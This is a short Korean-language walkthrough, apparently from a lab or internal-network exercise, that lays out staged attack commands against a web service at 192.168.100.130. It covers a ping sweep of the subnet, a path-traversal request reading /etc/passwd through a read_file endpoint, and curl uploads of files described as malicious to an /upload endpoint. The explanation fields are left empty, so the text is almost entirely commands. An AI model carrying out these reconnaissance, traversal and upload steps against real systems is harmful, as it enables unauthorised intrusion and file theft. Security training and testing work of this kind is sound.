1단계. 내부망 정찰 – 네트워크 스캐닝

cmd
코드 복사
python netscan.py

cmd
코드 복사
ping -n 1 192.168.100.1
ping -n 1 192.168.100.2
...
ping -n 1 192.168.100.255

🔍 목적: 살아있는 호스트(응답하는 IP) 식별


✅ 2단계. 웹 기반 공격 준비 – curl로 악성 파일 다운로드

cmd
코드 복사
curl <http://192.168.100.130:7777/swagger.json>
curl <http://192.168.100.130:7777/read_file>
curl <http://192.168.100.130:7777/read_file?filename=../../../etc/passwd>

🔍 분석:


✅ 3단계. 악성 파일 업로드 및 실행

cmd
코드 복사
curl -X POST "<http://192.168.100.130:7777/upload>" -F "file=@ZAP_2.14.0_Linux.tar.gz"
curl -X POST "<http://192.168.100.130:7777/upload>" -F "[email protected]"
curl -X POST "<http://192.168.100.130:7777/upload>" -F "[email protected]"

🔍 의도: